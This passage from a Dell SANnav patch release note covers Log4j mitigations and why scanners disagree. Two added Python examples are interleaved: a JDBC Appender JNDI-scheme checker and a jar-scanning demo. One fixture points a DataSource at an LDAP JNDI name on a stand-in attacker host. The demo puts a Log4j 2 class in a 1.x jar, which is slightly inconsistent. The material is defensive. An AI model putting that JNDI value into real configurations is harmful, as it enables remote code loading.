Dell Connectrix DS 6630B SANnav Management Portal 2.1.1.7 CSI Patch Release Co - Page 3

Dell Connectrix SANnav Portal Patch Release Content Notes
• SocketServer
Note: All of these objects are removed from the SANnav code with this CSI patch.

Log4j 2.x mitigation
• In prior releases, confirm that if the JDBC Appender is being used it is not configured to use any protocol other than Java.
Note: This is the mitigation that is provided in this SANnav patch.
• Upgrade to Log4j 2.17.1 (for Java 8 and later).
Note: Due to the significant complexity of upgrading the OSS components in SANnav that use Log4j 2.x, this mitigation is NOT provided in this SANnav patch.
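The JDBC Appender check above, as an added example that is not code from the SANnav patch or from Log4j: a Python script that parses a log4j2.xml configuration and reports every JDBC Appender whose DataSource jndiName carries a JNDI scheme other than java. Both configurations embedded in it are constructed for this illustration, and the function names are assumptions.

```python
"""Flag Log4j 2.x JDBC Appenders whose DataSource uses a non-"java" JNDI scheme.

Added example, not code from the SANnav CSI patch or from Log4j. It mirrors the
mitigation for releases before 2.17.1: a JDBC Appender must only reference its
DataSource through the java: JNDI protocol. The function names and the two
configurations below are assumptions constructed for this illustration.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit


def jndi_scheme(jndi_name: str) -> str:
    """Scheme of a JNDI name, lower-cased; "" when the name has none.

    "java:comp/env/jdbc/LoggingDS" -> "java", "ldap://host/x" -> "ldap",
    "jdbc/LoggingDS" -> "" (a relative name resolved in the initial context).
    """
    return urlsplit(jndi_name.strip()).scheme.lower()


def find_unsafe_jdbc_appenders(config_xml: str) -> list:
    """Return (appender name, jndiName) for each JDBC Appender whose DataSource
    jndiName carries a scheme other than java.

    Element and attribute names are matched case-insensitively because
    log4j2.xml accepts JDBC/Jdbc, DataSource/dataSource and jndiName/JndiName.
    A DataSource whose name has no scheme, or an appender that uses a
    ConnectionFactory instead of JNDI, is not reported.
    """
    root = ET.fromstring(config_xml)
    findings = []
    for appender in root.iter():
        if appender.tag.lower() != "jdbc":
            continue
        for child in appender:
            if child.tag.lower() != "datasource":
                continue
            attrs = {k.lower(): v for k, v in child.attrib.items()}
            name = attrs.get("jndiname", "")
            scheme = jndi_scheme(name)
            if scheme and scheme != "java":
                findings.append((appender.get("name", "<unnamed>"), name))
    return findings


# Constructed sample: a JDBC Appender pointed at an LDAP JNDI name. Loading
# this configuration on a Log4j 2.x release before 2.17.1 is exactly the
# condition the mitigation rules out.
WEAK_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn">
  <Appenders>
    <JDBC name="dbLog" tableName="APPLICATION_LOG">
      <DataSource jndiName="ldap://attacker.example:1389/o=datasource"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="dbLog"/></Root>
  </Loggers>
</Configuration>
"""

# Constructed sample: the same appender bound to a container-managed
# DataSource under the java: namespace, the only scheme the mitigation allows.
SAFE_CONFIG = WEAK_CONFIG.replace(
    'jndiName="ldap://attacker.example:1389/o=datasource"',
    'jndiName="java:comp/env/jdbc/LoggingDataSource"')


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("safe", SAFE_CONFIG)):
        print(label, find_unsafe_jdbc_appenders(cfg))
```

Run it against each log4j2.xml (or the equivalent properties/JSON file converted to XML) that SANnav's bundled services load; an empty list is the condition the mitigation asks you to confirm. Names without a scheme are left alone because the mitigation is about the protocol used, not about whether JNDI is used at all.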
Important Notes Regarding Software Security Scans and Log4j
1. Security scanners that scan down inside code to validate that potentially vulnerable class objects exist or have been removed will report “Mitigated” after applying this CSI patch. Logpresso and other such scanners will indicate the related SANnav files as “MITIGATED”.
2. Other scanners that do not scan down inside code may still indicate potential vulnerabilities after applying this CSI patch. This is because Log4j version 1.x code is still present within SANnav, even though the vulnerable objects have been removed. Nessus is one such scanner, and may report the following:
   • 156860 - Apache Log4j 1.x Multiple Vulnerabilities: According to its self-reported version number, the installation of Apache Log4j on the remote host is 1.x and is no longer supported. Log4j reached its end of life prior to 2016. Log4j 1.x is affected by multiple vulnerabilities.
   • 156032 - Apache Log4j Unsupported Version Detection: A logging library running on the remote host is no longer supported.
Note that while SANnav is not believed to be vulnerable to any of the identified Log4j 1.x CVEs, this CSI patch addresses any potential exploit by removing the impacted Log4j 1.x classes.
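Why the two kinds of scanner disagree, as an added example that is neither the SANnav CSI patch script nor any scanner vendor's code: a Python script that builds a constructed stand-in for a Log4j 1.x jar, runs a version-based check (manifest version, what a Nessus-style plugin keys on) and a class-based check (named class entries, what a Logpresso-style scanner keys on) against it, strips the named classes the way a class-removal patch does, and scans again. The jar's file name, manifest, entry paths and the function names are assumptions for this illustration; real SANnav jars differ.

```python
"""Version-based vs. class-based Log4j checks on a jar, before and after the
watched classes are stripped.

Added example, not the SANnav CSI patch script and not any scanner's code. The
jar is a constructed stand-in built in a temporary directory; its file name,
manifest and entry paths are assumptions for this illustration only.
"""
import os
import tempfile
import zipfile

# Simple class names a code-inspecting scanner looks for inside the jar. These
# are the two classes this page names among those the patch removes.
WATCHED_CLASSES = ("SocketServer", "JndiLookup")

# Placeholder bytes standing in for class files; the checks below look only at
# entry names, never at bytecode.
FAKE_CLASS = b"\xca\xfe\xba\xbe"


def build_sample_jar(directory: str) -> str:
    """Write a constructed log4j-1.2.17.jar holding a manifest, one harmless
    class and the two watched classes; return its path. Entry paths are chosen
    for the example; matching is by simple class name, so they do not matter."""
    path = os.path.join(directory, "log4j-1.2.17.jar")
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     "Manifest-Version: 1.0\nImplementation-Version: 1.2.17\n")
        jar.writestr("org/apache/log4j/Logger.class", FAKE_CLASS)
        jar.writestr("org/apache/log4j/net/SocketServer.class", FAKE_CLASS)
        jar.writestr("org/apache/logging/log4j/core/lookup/JndiLookup.class",
                     FAKE_CLASS)
    return path


def _matches(entry: str, class_name: str) -> bool:
    """True when a jar entry is the class file for the given simple name."""
    return entry.endswith("/" + class_name + ".class")


def log4j_version(jar_path: str) -> str:
    """Version-based check: the Implementation-Version from the manifest, which
    is what a scanner that does not look inside the code reports against."""
    with zipfile.ZipFile(jar_path) as jar:
        manifest = jar.read("META-INF/MANIFEST.MF").decode()
    for line in manifest.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "Implementation-Version":
            return value.strip()
    return ""


def watched_classes_present(jar_path: str) -> list:
    """Class-based check: sorted simple names of watched classes still packaged
    in the jar. An empty list is what a Logpresso-style scanner calls
    MITIGATED."""
    with zipfile.ZipFile(jar_path) as jar:
        entries = jar.namelist()
    return sorted(c for c in WATCHED_CLASSES
                  if any(_matches(e, c) for e in entries))


def remove_classes(jar_path: str, class_names) -> list:
    """Rewrite the jar without the named classes, leaving every other entry and
    the manifest untouched (the effect of a class-removal patch script; from a
    shell, `zip -d` on the entry path does the same). Returns removed entries."""
    tmp = jar_path + ".tmp"
    removed = []
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if any(_matches(info.filename, c) for c in class_names):
                removed.append(info.filename)
                continue
            dst.writestr(info, src.read(info.filename))
    os.replace(tmp, jar_path)
    return removed


def scan(jar_path: str) -> dict:
    """Both findings for one jar: what a version-only scanner and what a
    class-inspecting scanner would say."""
    version = log4j_version(jar_path)
    present = watched_classes_present(jar_path)
    return {
        "version_finding": "Log4j 1.x unsupported" if version.startswith("1.") else "",
        "class_finding": "MITIGATED" if not present
                         else "PRESENT: " + ", ".join(present),
    }


def demo() -> tuple:
    """Build the stand-in jar, scan, strip the watched classes, scan again."""
    with tempfile.TemporaryDirectory() as workdir:
        jar = build_sample_jar(workdir)
        before = scan(jar)
        removed = remove_classes(jar, WATCHED_CLASSES)
        after = scan(jar)
    return before, removed, after


if __name__ == "__main__":
    for label, result in zip(("before", "removed", "after"), demo()):
        print(label, result)
```

The version finding is identical before and after because stripping entries changes neither the manifest nor the jar's file name, which is why the two Nessus plugins keep firing on a patched SANnav host. When you triage that result, record the class-based finding (or a `unzip -l` listing showing the entries are gone) as the evidence for the mitigation rather than waiting for the version check to clear.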
SANnav v2.1.1.7 Patch Release Content
This patch includes the following fixes/updates:
1. This SANnav v2.1.1.7 CSI patch includes the following updates to mitigate the Log4j 1.x and 2.x vulnerabilities previously explained:
   • A script that removes the following Java classes from the Log4j 1.x jars in SANnav code to eliminate any possible exploits. By removing these classes, SANnav code is fully remediated against all currently known Log4j 1.x vulnerabilities.
     - JndiLookup